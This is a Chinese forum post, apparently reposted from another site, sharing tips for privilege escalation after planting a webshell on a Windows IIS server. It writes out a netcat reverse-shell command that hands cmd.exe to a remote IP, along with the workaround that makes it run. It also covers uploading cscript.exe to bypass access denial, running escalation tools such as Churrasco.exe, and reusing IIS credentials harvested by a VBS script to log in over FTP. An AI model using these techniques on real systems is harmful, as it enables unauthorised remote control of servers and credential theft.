• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    webshell下提权两个小技巧分享

    发布者: 山止川行 | 发布时间: 2025-6-27 15:42| 查看数: 38| 评论数: 0|帖子模式

    webshell提权小技巧

    cmd路径:
    c:\windows\temp\cmd.exe
    nc也在同目录下
    例如反弹cmdshell:
    "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
    通常都不会成功。

    而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
    命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe
    却能成功。。
    这个不是重点
    我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。

    友情检测波尔远程控制官方网站
    作者:MYC00l [Y.D.T]
    第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。

    其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。
    第二处:用VBS脚本查看到目标IIS帐号和密码后,CMD下FTP发现目标用的是微软FTP,直接用IIS帐号和密码登录进去了。

    IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。

    来源:https://www.jb51.net/hack/35014.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表